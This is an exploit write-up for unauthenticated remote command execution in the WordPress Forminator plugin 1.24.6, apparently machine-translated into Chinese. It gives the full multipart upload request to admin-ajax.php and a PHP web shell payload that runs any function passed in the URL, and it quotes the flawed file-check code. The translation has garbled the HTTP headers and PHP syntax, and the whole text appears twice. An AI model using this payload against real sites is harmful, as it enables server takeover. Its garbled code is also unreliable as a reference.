#exploit title: wordpress插件构造1.24.6-未身份验证的远程命令执行
#日期: 2023-07-20
#利用作者: MehmetKelepçe
#供应商homepage3360 https://wpmudev.com/project/forminator-pro/
#软件link: https://wordpress.org/plugins/forminator/
#版本: 1.24.6
#在: php -mysql -apache2 -Windows 11中测试
HTTP请求和弱势参数:
------------------------------------------------------------------------------------------------------------------------
post /3/wordpress/wp-admin/admin-ajax.php http/1.1
HOST: LOCALHOST
内容长度: 1756
SEC-CH-UA:
ACCEPT: /
content-type:多部分/form-data;
边界=---- WebKitformBoundaryTMSFFKBEGMAJOMNE
X-重新要求- WITH: XMLHTTPREQUEST
sec-ch-ua-mobile:0
用户代理: Mozilla/5.0(Windows NT 10.0; Win64; X64)
Applewebkit/537.36(Khtml,像壁虎一样)Chrome/114.0.5735.199
Safari/537.36
sec-ch-ua-platform:''
Origin: http://localhost
sec-fetch-site:相同原产
sec-fetch mode: cors
sec-fetch-Dest:空
Referer: http://localhost/3/WordPress/2023/01/01/Merhaba-dunya/
Accept-incoding: Gzip,放气
Accept-Language: en-us,en; q=0.9
cookie: wp-settings time-1=1689794282;
wordpress_test_cookie=wp%20cookie%20check; wp_lang=tr_tr
连接:关闭。。。
------ WebKitformBoundaryTMSFFKBEGMAJOMNE
content-disposition: form-data; name='PostData-1-post-image';
文件名='mehmet.php'
content-type:应用程序/钟表流
php
$ _get ['function']($ _ get ['cmd']);
?
源代码:
wp-content/插件/folminator/library/模块/自定义形式/front/front Render.php:
--------------------------------------------------------------------------------------------------------------
public函数has_upload(){
$ fields=$ this-get_fields();
if(!empty($ fields)){
foreach($ fields as $ field){
if('upload'===$ field ['type'] ||'postData'====$ field ['type']){
返回true;
}
}
}
返回false;
}
脆弱的参数: PostData-1-Post-image
和
源代码:
wp-content/插件/folminator/library/fields/postdata.php:
--------------------------------------------------------------------------------------------------------
if(!
if(isset($ _files [$ image_field_name] ['name'])!
$ _files [$ image_field_name] ['name']){
$ file_name=sanitize_file_name($ _files [$ image_field_name] ['name']);
$有效=wp_check_filetype($ file_name);
if(false===$有效['ext'] ||!in_array($ vARE ['ext'],
$ this-image_extensions)){
$ this-validation_message [$ image_field_name]=apply_filters(
'forminator_postdata_field_post_image_nr_validation_message',
ESC_HTML __(不允许上传文件\'s扩展名。
$ id
);
}
}
}
弱点功能: $ image_field_name
------------------------------------------------------------------------------------------------------------------------
有效载荷文件: mehmet.php
php
$ _get ['function']($ _ get ['cmd']);
?
------------------------------------------------------------------------------------------------------------------------
#日期: 2023-07-20
#利用作者: MehmetKelepçe
#供应商homepage3360 https://wpmudev.com/project/forminator-pro/
#软件link: https://wordpress.org/plugins/forminator/
#版本: 1.24.6
#在: php -mysql -apache2 -Windows 11中测试
HTTP请求和弱势参数:
------------------------------------------------------------------------------------------------------------------------
post /3/wordpress/wp-admin/admin-ajax.php http/1.1
HOST: LOCALHOST
内容长度: 1756
SEC-CH-UA:
ACCEPT: /
content-type:多部分/form-data;
边界=---- WebKitformBoundaryTMSFFKBEGMAJOMNE
X-重新要求- WITH: XMLHTTPREQUEST
sec-ch-ua-mobile:0
用户代理: Mozilla/5.0(Windows NT 10.0; Win64; X64)
Applewebkit/537.36(Khtml,像壁虎一样)Chrome/114.0.5735.199
Safari/537.36
sec-ch-ua-platform:''
Origin: http://localhost
sec-fetch-site:相同原产
sec-fetch mode: cors
sec-fetch-Dest:空
Referer: http://localhost/3/WordPress/2023/01/01/Merhaba-dunya/
Accept-incoding: Gzip,放气
Accept-Language: en-us,en; q=0.9
cookie: wp-settings time-1=1689794282;
wordpress_test_cookie=wp%20cookie%20check; wp_lang=tr_tr
连接:关闭。。。
------ WebKitformBoundaryTMSFFKBEGMAJOMNE
content-disposition: form-data; name='PostData-1-post-image';
文件名='mehmet.php'
content-type:应用程序/钟表流
php
$ _get ['function']($ _ get ['cmd']);
?
源代码:
wp-content/插件/folminator/library/模块/自定义形式/front/front Render.php:
--------------------------------------------------------------------------------------------------------------
public函数has_upload(){
$ fields=$ this-get_fields();
if(!empty($ fields)){
foreach($ fields as $ field){
if('upload'===$ field ['type'] ||'postData'====$ field ['type']){
返回true;
}
}
}
返回false;
}
脆弱的参数: PostData-1-Post-image
和
源代码:
wp-content/插件/folminator/library/fields/postdata.php:
--------------------------------------------------------------------------------------------------------
if(!
if(isset($ _files [$ image_field_name] ['name'])!
$ _files [$ image_field_name] ['name']){
$ file_name=sanitize_file_name($ _files [$ image_field_name] ['name']);
$有效=wp_check_filetype($ file_name);
if(false===$有效['ext'] ||!in_array($ vARE ['ext'],
$ this-image_extensions)){
$ this-validation_message [$ image_field_name]=apply_filters(
'forminator_postdata_field_post_image_nr_validation_message',
ESC_HTML __(不允许上传文件\'s扩展名。
$ id
);
}
}
}
弱点功能: $ image_field_name
------------------------------------------------------------------------------------------------------------------------
有效载荷文件: mehmet.php
php
$ _get ['function']($ _ get ['cmd']);
?
------------------------------------------------------------------------------------------------------------------------